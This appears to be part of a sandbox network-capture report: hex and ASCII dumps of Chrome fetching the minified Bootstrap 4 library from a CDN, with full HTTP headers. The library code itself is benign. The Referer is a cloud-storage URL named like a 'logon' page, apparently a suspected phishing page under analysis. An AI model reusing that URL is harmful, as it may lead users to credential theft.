                                                                                                                                                                                2021-10-25 16:17:23 UTC113INData Raw: 29 7c 7c 28 6e 3d 6e 65 77 20 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2c 74 68 69 73 2e 5f 67 65 74 44 65 6c 65 67 61 74 65 43 6f 6e 66 69 67 28 29 29 2c 74 28 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 29 2e 64 61 74 61 28 69 2c 6e 29 29 2c 65 26 26 28 6e 2e 5f 61 63 74 69 76 65 54 72 69 67 67 65 72 5b 22 66 6f 63 75 73 6f 75 74 22 3d 3d 3d 65 2e 74 79 70 65 3f 54 3a 45 5d 3d 21 31 29 2c 6e 2e 5f 69 73 57 69 74 68 41 63 74 69 76 65 54 72 69 67 67 65 72 28 29 7c 7c 28 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6e 2e 5f 74 69 6d 65 6f 75 74 29 2c 6e 2e 5f 68 6f 76 65 72 53 74 61 74 65 3d 64 2c 6e 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 26 26 6e 2e 63 6f 6e 66 69 67 2e 64 65 6c 61 79 2e 68 69 64 65 3f 6e
                                                                                                                                                                                Data Ascii: )||(n=new this.constructor(e.currentTarget,this._getDelegateConfig()),t(e.currentTarget).data(i,n)),e&&(n._activeTrigger["focusout"===e.type?T:E]=!1),n._isWithActiveTrigger()||(clearTimeout(n._timeout),n._hoverState=d,n.config.delay&&n.config.delay.hide?n
                                                                                                                                                                                2021-10-25 16:17:23 UTC115INData Raw: 69 64 65 28 29 2c 74 68 69 73 2e 73 68 6f 77 28 29 2c 74 68 69 73 2e 63 6f 6e 66 69 67 2e 61 6e 69 6d 61 74 69 6f 6e 3d 6e 29 7d 2c 61 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 28 74 68 69 73 29 2e 64 61 74 61 28 69 29 2c 73 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 3b 69 66 28 28 6e 7c 7c 21 2f 64 69 73 70 6f 73 65 7c 68 69 64 65 2f 2e 74 65 73 74 28 65 29 29 26 26 28 6e 7c 7c 28 6e 3d 6e 65 77 20 61 28 74 68 69 73 2c 73 29 2c 74 28 74 68 69 73 29 2e 64 61 74 61 28 69 2c 6e 29 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65
                                                                                                                                                                                Data Ascii: ide(),this.show(),this.config.animation=n)},a._jQueryInterface=function(e){return this.each(function(){var n=t(this).data(i),s="object"==typeof e&&e;if((n||!/dispose|hide/.test(e))&&(n||(n=new a(this,s),t(this).data(i,n)),"string"==typeof e)){if("undefine
                                                                                                                                                                                2021-10-25 16:17:23 UTC116INData Raw: 4d 4f 55 53 45 4c 45 41 56 45 3a 22 6d 6f 75 73 65 6c 65 61 76 65 22 2b 69 7d 2c 67 3d 66 75 6e 63 74 69 6f 6e 28 72 29 7b 76 61 72 20 6f 2c 67 3b 66 75 6e 63 74 69 6f 6e 20 70 28 29 7b 72 65 74 75 72 6e 20 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7c 7c 74 68 69 73 7d 67 3d 72 2c 28 6f 3d 70 29 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 67 2e 70 72 6f 74 6f 74 79 70 65 29 2c 6f 2e 70 72 6f 74 6f 74 79 70 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 6f 2c 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 67 3b 76 61 72 20 6d 3d 70 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 6d 2e 69 73 57 69 74 68 43 6f 6e 74 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 65 74 54 69
                                                                                                                                                                                Data Ascii: MOUSELEAVE:"mouseleave"+i},g=function(r){var o,g;function p(){return r.apply(this,arguments)||this}g=r,(o=p).prototype=Object.create(g.prototype),o.prototype.constructor=o,o.__proto__=g;var m=p.prototype;return m.isWithContent=function(){return this.getTi
                                                                                                                                                                                2021-10-25 16:17:23 UTC117INData Raw: 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 7d 7d 2c 7b 6b 65 79 3a 22 45 76 65 6e 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 7d 7d 2c 7b 6b 65 79 3a 22 45 56 45 4e 54 5f 4b 45 59 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 54 79 70 65 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 5d 29 2c 70 7d 28 55 29 3b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d 67 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 5b 65 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 67 2c 74 2e 66 6e 5b 65 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 5b 65 5d 3d
                                                                                                                                                                                Data Ascii: ction(){return n}},{key:"Event",get:function(){return _}},{key:"EVENT_KEY",get:function(){return i}},{key:"DefaultType",get:function(){return h}}]),p}(U);return t.fn[e]=g._jQueryInterface,t.fn[e].Constructor=g,t.fn[e].noConflict=function(){return t.fn[e]=
                                                                                                                                                                                2021-10-25 16:17:23 UTC119INData Raw: 2e 5f 73 63 72 6f 6c 6c 45 6c 65 6d 65 6e 74 2e 77 69 6e 64 6f 77 3f 64 3a 5f 2c 69 3d 22 61 75 74 6f 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 3f 6e 3a 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6d 65 74 68 6f 64 2c 73 3d 69 3d 3d 3d 5f 3f 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 28 29 3a 30 3b 74 68 69 73 2e 5f 6f 66 66 73 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 74 61 72 67 65 74 73 3d 5b 5d 2c 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 28 29 2c 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 74 68 69 73 2e 5f 73 65 6c 65 63 74 6f 72 29 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 2c 72 3d 50 2e 67 65 74 53 65 6c 65 63 74 6f
                                                                                                                                                                                Data Ascii: ._scrollElement.window?d:_,i="auto"===this._config.method?n:this._config.method,s=i===_?this._getScrollTop():0;this._offsets=[],this._targets=[],this._scrollHeight=this._getScrollHeight(),t.makeArray(t(this._selector)).map(function(e){var n,r=P.getSelecto
                                                                                                                                                                                2021-10-25 16:17:23 UTC120INData Raw: 67 2e 5f 70 72 6f 63 65 73 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 54 6f 70 28 29 2b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 2c 65 3d 74 68 69 73 2e 5f 67 65 74 53 63 72 6f 6c 6c 48 65 69 67 68 74 28 29 2c 6e 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6f 66 66 73 65 74 2b 65 2d 74 68 69 73 2e 5f 67 65 74 4f 66 66 73 65 74 48 65 69 67 68 74 28 29 3b 69 66 28 74 68 69 73 2e 5f 73 63 72 6f 6c 6c 48 65 69 67 68 74 21 3d 3d 65 26 26 74 68 69 73 2e 72 65 66 72 65 73 68 28 29 2c 74 3e 3d 6e 29 7b 76 61 72 20 69 3d 74 68 69 73 2e 5f 74 61 72 67 65 74 73 5b 74 68 69 73 2e 5f 74 61 72 67 65 74 73 2e 6c 65 6e 67 74 68 2d 31 5d 3b 74 68 69 73 2e 5f 61 63 74 69 76 65 54 61 72 67 65 74 21 3d
                                                                                                                                                                                Data Ascii: g._process=function(){var t=this._getScrollTop()+this._config.offset,e=this._getScrollHeight(),n=this._config.offset+e-this._getOffsetHeight();if(this._scrollHeight!==e&&this.refresh(),t>=n){var i=this._targets[this._targets.length-1];this._activeTarget!=
                                                                                                                                                                                2021-10-25 16:17:23 UTC121INData Raw: 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 65 2b 27 22 27 29 3b 69 5b 65 5d 28 29 7d 7d 29 7d 2c 73 28 6f 2c 6e 75 6c 6c 2c 5b 7b 6b 65 79 3a 22 56 45 52 53 49 4f 4e 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 34 2e 30 2e 30 22 7d 7d 2c 7b 6b 65 79 3a 22 44 65 66 61 75 6c 74 22 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 61 7d 7d 5d 29 2c 6f 7d 28 29 3b 72 65 74 75 72 6e 20 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 68 2e 4c 4f 41 44 5f 44 41 54 41 5f 41 50 49 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 6d 61 6b 65 41 72 72 61 79 28 74 28 66 2e 44 41 54 41 5f 53 50 59 29 29 2c 6e 3d 65 2e 6c 65 6e 67 74 68 3b 6e 2d 2d 3b 29
                                                                                                                                                                                Data Ascii: ew TypeError('No method named "'+e+'"');i[e]()}})},s(o,null,[{key:"VERSION",get:function(){return"4.0.0"}},{key:"Default",get:function(){return a}}]),o}();return t(window).on(h.LOAD_DATA_API,function(){for(var e=t.makeArray(t(f.DATA_SPY)),n=e.length;n--;)
                                                                                                                                                                                2021-10-25 16:17:23 UTC123INData Raw: 75 29 2c 21 75 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 26 26 21 63 2e 69 73 44 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 28 29 29 7b 6f 26 26 28 6e 3d 74 28 6f 29 5b 30 5d 29 2c 74 68 69 73 2e 5f 61 63 74 69 76 61 74 65 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 73 29 3b 76 61 72 20 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3d 74 2e 45 76 65 6e 74 28 72 2e 48 49 44 44 45 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 65 2e 5f 65 6c 65 6d 65 6e 74 7d 29 2c 73 3d 74 2e 45 76 65 6e 74 28 72 2e 53 48 4f 57 4e 2c 7b 72 65 6c 61 74 65 64 54 61 72 67 65 74 3a 69 7d 29 3b 74 28 69 29 2e 74 72 69 67 67 65 72 28 6e 29 2c 74 28 65 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 72 69 67 67 65 72 28 73 29 7d 3b 6e 3f 74 68 69 73 2e 5f
                                                                                                                                                                                Data Ascii: u),!u.isDefaultPrevented()&&!c.isDefaultPrevented()){o&&(n=t(o)[0]),this._activate(this._element,s);var g=function(){var n=t.Event(r.HIDDEN,{relatedTarget:e._element}),s=t.Event(r.SHOWN,{relatedTarget:i});t(i).trigger(n),t(e._element).trigger(s)};n?this._
                                                                                                                                                                                2021-10-25 16:17:23 UTC124INData Raw: 75 6d 65 6e 74 29 2e 6f 6e 28 72 2e 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 2c 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 74 28 74 68 69 73 29 2c 22 73 68 6f 77 22 29 7d 29 2c 74 2e 66 6e 2e 74 61 62 3d 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 74 2e 66 6e 2e 74 61 62 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 76 2c 74 2e 66 6e 2e 74 61 62 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 2e 66 6e 2e 74 61 62 3d 69 2c 76 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 76 7d 28 65 29 3b 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22
                                                                                                                                                                                Data Ascii: ument).on(r.CLICK_DATA_API,g,function(e){e.preventDefault(),v._jQueryInterface.call(t(this),"show")}),t.fn.tab=v._jQueryInterface,t.fn.tab.Constructor=v,t.fn.tab.noConflict=function(){return t.fn.tab=i,v._jQueryInterface},v}(e);!function(t){if("undefined"
                                                                                                                                                                                2021-10-25 16:17:23 UTC125INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                6192.168.2.349758104.18.10.207443C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                2021-10-25 16:17:23 UTC233OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                                                                                                                Host: stackpath.bootstrapcdn.com
                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                Referer: https://00f74ba44bb50aa58a9dfd79647238a8f996daa403-apidata.googleusercontent.com/download/storage/v1/b/logon_id63757945b-32c6-49b0-83e6-1d93765276e7/o/index.html?jk=AFshE3VcvfzNdf-7zMKWd94-4dMrNIkOLLE47CQ43PY7P2MYpfKpiTisbCiM8ITDVUzsV5uBnwUTgNfImCvdn95XFg7yLPb4pK7mGtnykL6H73onzrS0TNqkpgxfmCGl9SjrMUh2HXQovXq0n_fa5hqbVlcfrBGOpBCkBBOuoY-yrNdFJA6qsh5mXJeZJEWhpyesRFni67jgONcRuOW0IhE2TSFjfiZ1kcHtUg4IakFROfuF2ixmgmZ0cygvwFJgzltWAi4BZy9gK7vN7kuIcB7IqaENeixO24771GkuNYSmkiDTJACa0r0VCNPcQlcK5lGRRAu7CmqBicTQElQR1sT8UAlS8qEccylxwvHxtG1ZQipoKLv7jRTmXa5gKf9qryarS-JmN2Dw-wvzqjvQU3ACMffC05IslAl45AuBr7XJD_AvOH4XV0oB1K69D_BJqrPx5F866tHjL87vL2OzmhOn2ZN6fGK9EaMH6l71egHyEMNh69wwpAccwpkljLmJNVIqygOVxaM5girr-FZHO5mJNqOa9bTFJMZFMQk75Bh1YPELgAun31aycC9L1gEIgi9xS2AI2BDHPNQB6OaElZLJZDJIsOs0jHoqoRQa-BsTDGYlSbZcoI1h5QuM3VxHMbmAZYEyCbHgEmb6QFG4Do70MelMz0hmqK1LB3zOLUGQVyL1NduEuvkLQPWtxDQ3Zeb-GyuldZGFe6ZOCmXUvu2OKrXBBFC3a0i4Io1wftvhtL1urvwaLVPFECoQBACGCtpQtZ45u5bBlHyHOYGrix_HPHteuU8UlCF1QPHHFIVg5XjWbBd9deixk_udmpRBTRN6b7-93o-J_Lga6iMebvzrAh6z2qFEd8YAqgMmCaIpY3uuMGkMbvjX_71pF2dS6_eUeo82_XpG60fSB3QZnvV0oMGUvZu6gOHeues8gSXLQCwqfhwa_7AgDj94Gv_4jjp6oSobCikZNfcIVBrhso8uTX4sUJ5X9GsLxXBisRNqpQ&isca=1
                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                2021-10-25 16:17:23 UTC234INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Mon, 25 Oct 2021 16:17:23 GMT
                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                CDN-PullZone: 252412
                                                                                                                                                                                CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                                                                                                                CDN-RequestCountryCode: DE
                                                                                                                                                                                CDN-EdgeStorageId: 723
                                                                                                                                                                                CDN-EdgeStorageId: 718
                                                                                                                                                                                Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                                                                                                                CDN-CachedAt: 2021-03-11 11:57:52
                                                                                                                                                                                CDN-RequestPullSuccess: True
                                                                                                                                                                                CDN-RequestPullCode: 200
                                                                                                                                                                                Cache-Control: public, max-age=31919000
                                                                                                                                                                                timing-allow-origin: *
                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                x-content-type-options: nosniff
                                                                                                                                                                                CDN-RequestId: 48f4598378fe1b699fcee6ac68d6cc25
                                                                                                                                                                                CDN-Cache: HIT
                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                Age: 18731360
                                                                                                                                                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 6a3cc13929341f15-FRA
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                2021-10-25 16:17:23 UTC235INData Raw: 66 62 65 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                                                                                                                Data Ascii: fbe/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                                                                                                                2021-10-25 16:17:23 UTC236INData Raw: 64 75 6c 65 3f 65 28 65 78 70 6f 72 74 73 2c 72 65 71 75 69 72 65 28 22 6a 71 75 65 72 79 22 29 2c 72 65 71 75 69 72 65 28 22 70 6f 70 70 65 72 2e 6a 73 22 29 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20
                                                                                                                                                                                Data Ascii: dule?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var
                                                                                                                                                                                2021-10-25 16:17:23 UTC237INData Raw: 58 65 2c 74 6e 2c 65 6e 2c 6e 6e 2c 72 6e 2c 6f 6e 2c 73 6e 2c 61 6e 2c 6c 6e 2c 63 6e 2c 68 6e 2c 75 6e 2c 66 6e 2c 64 6e 2c 67 6e 2c 5f 6e 2c 6d 6e 2c 70 6e 2c 76 6e 2c 79 6e 2c 45 6e 2c 43 6e 2c 54 6e 2c 62 6e 2c 53 6e 2c 49 6e 2c 41 6e 2c 44 6e 2c 77 6e 2c 4e 6e 2c 4f 6e 2c 6b 6e 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28
                                                                                                                                                                                Data Ascii: Xe,tn,en,nn,rn,on,sn,an,ln,cn,hn,un,fn,dn,gn,_n,mn,pn,vn,yn,En,Cn,Tn,bn,Sn,In,An,Dn,wn,Nn,On,kn,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(
                                                                                                                                                                                2021-10-25 16:17:23 UTC238INData Raw: 45 4e 44 5d 3d 7b 62 69 6e 64 54 79 70 65 3a 65 2c 64 65 6c 65 67 61 74 65 54 79 70 65 3a 65 2c 68 61 6e 64 6c 65 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 69 28 74 2e 74 61 72 67 65 74 29 2e 69 73 28 74 68 69 73 29 29 72 65 74 75 72 6e 20 74 2e 68 61 6e 64 6c 65 4f 62 6a 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d
                                                                                                                                                                                Data Ascii: END]={bindType:e,delegateType:e,handle:function(t){if(i(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"}
                                                                                                                                                                                2021-10-25 16:17:23 UTC239INData Raw: 37 66 66 61 0d 0a 6d 75 6c 61 74 65 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 74 29 7d 65 6c 73 65 20 74 68 69 73 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 28 65 29 7d 2c 74 2e 5f 64 65 73 74 72 6f 79 45 6c 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 28 74 29 2e 64 65 74 61 63 68 28 29 2e 74 72 69 67 67 65 72 28 75 2e 43 4c 4f 53 45 44 29 2e 72 65 6d 6f 76 65 28 29 7d 2c 69 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 28 74 68 69 73 29 2c 65 3d 74 2e 64 61 74 61 28 6f 29 3b 65 7c 7c 28 65 3d 6e 65 77 20 69 28 74 68 69 73 29 2c 74 2e 64 61 74 61 28 6f 2c 65 29 29 2c 22 63 6c 6f 73 65 22 3d
                                                                                                                                                                                Data Ascii: 7ffamulateTransitionEnd(t)}else this._destroyElement(e)},t._destroyElement=function(t){r(t).detach().trigger(u.CLOSED).remove()},i._jQueryInterface=function(n){return this.each(function(){var t=r(this),e=t.data(o);e||(e=new i(this),t.data(o,e)),"close"=
                                                                                                                                                                                2021-10-25 16:17:23 UTC241INData Raw: 54 29 2c 6d 28 69 29 2e 74 72 69 67 67 65 72 28 22 63 68 61 6e 67 65 22 29 7d 69 2e 66 6f 63 75 73 28 29 2c 65 3d 21 31 7d 7d 65 26 26 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 70 72 65 73 73 65 64 22 2c 21 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 54 29 29 2c 74 26 26 6d 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 54 29 7d 2c 74 2e 64 69 73 70 6f 73 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 2e 72 65 6d 6f 76 65 44 61 74 61 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2c 76 29 2c 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 6e 75 6c 6c 7d 2c 6e 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 3d 66 75 6e 63
                                                                                                                                                                                Data Ascii: T),m(i).trigger("change")}i.focus(),e=!1}}e&&this._element.setAttribute("aria-pressed",!this._element.classList.contains(T)),t&&m(this._element).toggleClass(T)},t.dispose=function(){m.removeData(this._element,v),this._element=null},n._jQueryInterface=func
                                                                                                                                                                                2021-10-25 16:17:23 UTC242INData Raw: 74 65 6d 2d 6c 65 66 74 22 2c 5a 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 22 2c 47 3d 22 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 24 3d 22 2e 61 63 74 69 76 65 22 2c 58 3d 22 2e 61 63 74 69 76 65 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 74 74 3d 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 22 2c 65 74 3d 22 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 6e 65 78 74 2c 20 2e 63 61 72 6f 75 73 65 6c 2d 69 74 65 6d 2d 70 72 65 76 22 2c 6e 74 3d 22 2e 63 61 72 6f 75 73 65 6c 2d 69 6e 64 69 63 61 74 6f 72 73 22 2c 69 74 3d 22 5b 64 61 74 61 2d 73 6c 69 64 65 5d 2c 20 5b 64 61 74 61 2d 73 6c 69 64 65 2d 74 6f 5d 22 2c 72 74 3d 27 5b 64 61 74 61 2d 72 69 64 65 3d 22 63 61 72 6f 75 73 65 6c 22 5d 27 2c 6f 74 3d 66 75 6e
